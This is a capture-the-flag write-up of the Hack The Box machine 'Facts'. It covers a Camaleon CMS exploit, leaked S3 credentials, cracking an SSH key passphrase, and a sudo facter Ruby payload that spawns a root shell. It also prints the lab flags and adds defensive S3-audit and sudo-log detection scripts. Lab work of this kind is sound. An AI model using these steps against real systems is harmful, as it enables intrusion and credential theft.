
Hack The Box

Facts

Tags: HTB, Easy, Linux, Web, PrivEsc

Summary

Facts is an Easy Linux machine running Camaleon CMS, vulnerable to an authenticated privilege escalation (CVE-2025-2304). Exploiting it exposes AWS S3 credentials pointing at an internal S3-compatible service, where a private SSH key is stored. The key (cracked with john) grants SSH access, and a sudo rule on facter is abused to run arbitrary Ruby and escalate to root.

Machine Information

| Name  | Difficulty | OS    | Platform     |
|-------|------------|-------|--------------|
| Facts | Easy       | Linux | Hack The Box |

Attack Path

  1. Nmap reveals HTTP and SSH.
  2. Web enumeration identifies an admin panel.
  3. The Camaleon CMS is exploited (CVE-2025-2304).
  4. AWS S3 credentials are extracted.
  5. A private SSH key is downloaded from an internal bucket.
  6. SSH access is obtained.
  7. sudo enumeration finds an allowed facter binary.
  8. facter is abused to run Ruby and escalate to root.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sV -T5 -sC 10.129.19.58

Nmap Scan

| Port | Service | Notes          |
|------|---------|----------------|
| 22   | SSH     | OpenSSH 9.9p1  |
| 80   | HTTP    | nginx (Ubuntu) |

Web Enumeration

The web application on port 80 was a site named Facts.

Web page

Content discovery with Gobuster:

gobuster dir -u http://facts.htb/ -w /usr/share/wordlists/dirb/common.txt

Gobuster

Findings:

Exploitation — Camaleon CMS (CVE-2025-2304)

The application uses Camaleon CMS v2.9.0, vulnerable to an authenticated privilege escalation (CVE-2025-2304).

python exploit.py -u http://facts.htb/ -U abc -P abc -e -r

Exploit

This elevated privileges inside the CMS and exposed AWS S3 credentials:

Access Key: AKIA13F1EA8B94A4DE85
Secret Key: AiZzRMmU6R3jv2SYM6D5hLjifqmIGCio9L0g/R2r
Endpoint:   http://localhost:54321

Initial Access

Using the AWS CLI against the internal endpoint:

aws --endpoint-url http://facts.htb:54321 s3 ls

Two buckets were found (internal, randomfacts). Sensitive files were downloaded from the internal bucket:

aws --endpoint-url http://facts.htb:54321 s3 cp s3://internal/.ssh/authorized_keys .
aws --endpoint-url http://facts.htb:54321 s3 cp s3://internal/.ssh/id_ed25519 .

AWS
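The bucket listing above is the point where the misconfiguration becomes visible: application-scoped S3 credentials could read SSH key material. The following is an added audit helper, not part of the original writeup, that parses `aws s3 ls --recursive` output and flags object keys that look like credentials or key material. The listing embedded in it is constructed for the example (the real bucket contents are only those shown on the page).

```python
import re
import sys

# Constructed sample in the shape of `aws s3 ls --recursive s3://<bucket>` output;
# not captured from the box.
SAMPLE_LISTING = """\
2025-01-10 10:02:11        401 .ssh/authorized_keys
2025-01-10 10:02:11        464 .ssh/id_ed25519
2025-01-10 10:02:12        102 .ssh/id_ed25519.pub
2025-01-10 10:03:40      12288 reports/q1.pdf
2025-01-10 10:04:02       1337 backup/.env
"""

# Object-key patterns that should never be readable with application credentials.
# Order matters: the first match supplies the reason, so the most specific come first.
SENSITIVE_PATTERNS = [
    (re.compile(r"(^|/)id_(rsa|dsa|ecdsa|ed25519)$"), "private ssh key"),
    (re.compile(r"(^|/)\.ssh/"), "ssh material"),
    (re.compile(r"(^|/)\.env$"), "dotenv secrets"),
    (re.compile(r"\.(pem|key|p12|pfx)$"), "key/cert file"),
]


def parse_listing(text):
    """Parse `aws s3 ls` lines into (size, key) tuples, skipping PRE/dir lines."""
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 3)
        if len(parts) != 4 or not parts[2].isdigit():
            continue
        _date, _time, size, key = parts
        entries.append((int(size), key))
    return entries


def find_sensitive(text):
    """Return [(key, reason)] for every object whose key matches a sensitive pattern."""
    hits = []
    for _size, key in parse_listing(text):
        for pattern, reason in SENSITIVE_PATTERNS:
            if pattern.search(key):
                hits.append((key, reason))
                break
    return hits


if __name__ == "__main__":
    # Pipe a real listing in, or run with no input to audit the constructed sample.
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LISTING
    for key, reason in find_sensitive(data):
        print(f"{reason:16} {key}")
```

Usage: `aws --endpoint-url http://<host>:<port> s3 ls --recursive s3://internal | python3 audit.py`. Anything it prints is a sign that either the object should not be in the bucket at all or the credential embedded in the web application is scoped far too broadly; on this box the remediation is both.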

The private key passphrase was cracked offline:

ssh2john id_ed25519 > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

John

passphrase: dragonballz

SSH access was then obtained with the key:

ssh -i id_ed25519 trivia@10.129.19.58

Privilege Escalation

Enumeration

sudo -l
User trivia may run: /usr/bin/facter

Abusing facter

facter loads custom facts from any directory passed with --custom-dir, and a custom fact is plain Ruby evaluated by the facter process. Run under the sudo rule, that Ruby executes as root. A malicious fact was created to spawn a privileged shell:

# /tmp/pwn.rb
Facter.add(:pwn) do
  setcode { exec("/bin/bash -p") }
end

# Invoke facter as root via the sudo rule, pointing it at the directory holding pwn.rb
sudo facter --custom-dir=/tmp pwn

This spawned a shell as root.
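Because sudo logs every invocation with the full command line, this escalation is easy to catch after the fact. The detection below is an added example, not part of the original writeup: it parses standard sudo log lines and alerts when facter is run as root with a flag that makes it load code from a caller-chosen directory (`--custom-dir` and `--external-dir` are real facter options; the hostname, timestamps and the `deploy` user in the sample lines are constructed).

```python
import re
import shlex

# Constructed sample auth.log lines in the sudo log format; not captured from the box.
SAMPLE_LOG = """\
Jan 10 12:00:01 facts sudo:   trivia : TTY=pts/0 ; PWD=/home/trivia ; USER=root ; COMMAND=/usr/bin/facter os.name
Jan 10 12:00:09 facts sudo:   trivia : TTY=pts/0 ; PWD=/home/trivia ; USER=root ; COMMAND=/usr/bin/facter --custom-dir=/tmp pwn
Jan 10 12:00:15 facts sudo:   trivia : TTY=pts/0 ; PWD=/home/trivia ; USER=root ; COMMAND=/usr/bin/facter --external-dir /dev/shm
Jan 10 12:01:00 facts sudo:   deploy : TTY=pts/1 ; PWD=/opt ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
"""

# Standard sudo log line: "<user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<argv>"
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# facter options that make it load Ruby (custom facts) or executables (external
# facts) from a directory the caller chooses.
LOADER_FLAGS = {"--custom-dir", "--external-dir"}


def parse_sudo(line):
    """Return (invoking_user, target_user, command) or None for non-sudo lines."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    return m.group("user"), m.group("target"), m.group("cmd")


def is_facter_loader(cmd):
    """True when the command is facter invoked with a directory-loading flag."""
    argv = shlex.split(cmd)
    if not argv or argv[0].rsplit("/", 1)[-1] != "facter":
        return False
    for arg in argv[1:]:
        # Accept both "--custom-dir=/tmp" and "--custom-dir /tmp" spellings.
        flag = arg.split("=", 1)[0]
        if flag in LOADER_FLAGS:
            return True
    return False


def detect(log_text):
    """Return [(user, command)] for root-level facter runs that load caller code."""
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_sudo(line)
        if parsed is None:
            continue
        user, target, cmd = parsed
        if target == "root" and is_facter_loader(cmd):
            alerts.append((user, cmd))
    return alerts


if __name__ == "__main__":
    for user, cmd in detect(SAMPLE_LOG):
        print(f"ALERT sudo facter code-load by {user}: {cmd}")
```

The plain `facter os.name` query is not flagged, so the rule does not fire on legitimate inventory use. Detection is only a backstop, though: the actual fix is removing the sudo rule, since any binary that evaluates user-supplied Ruby cannot be safely granted to an unprivileged user as root.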

Flags

User

cat /home/william/user.txt

User flag

4d4b5ae95ae5d03f02e36d20ed2fd319

Root

cat /root/root.txt

Root flag

a09e07c25af8e613bfc5747fb73823d3

Vulnerabilities Identified

Privilege Escalation in Camaleon CMS (CVE-2025-2304)

Impact: full application compromise and access to internal infrastructure (S3).

Insecure S3 Exposure

Impact: disclosure of a private SSH key and direct system access.

Misconfigured sudo (facter)

Impact: full privilege escalation to root.

Tools Used

Key Takeaways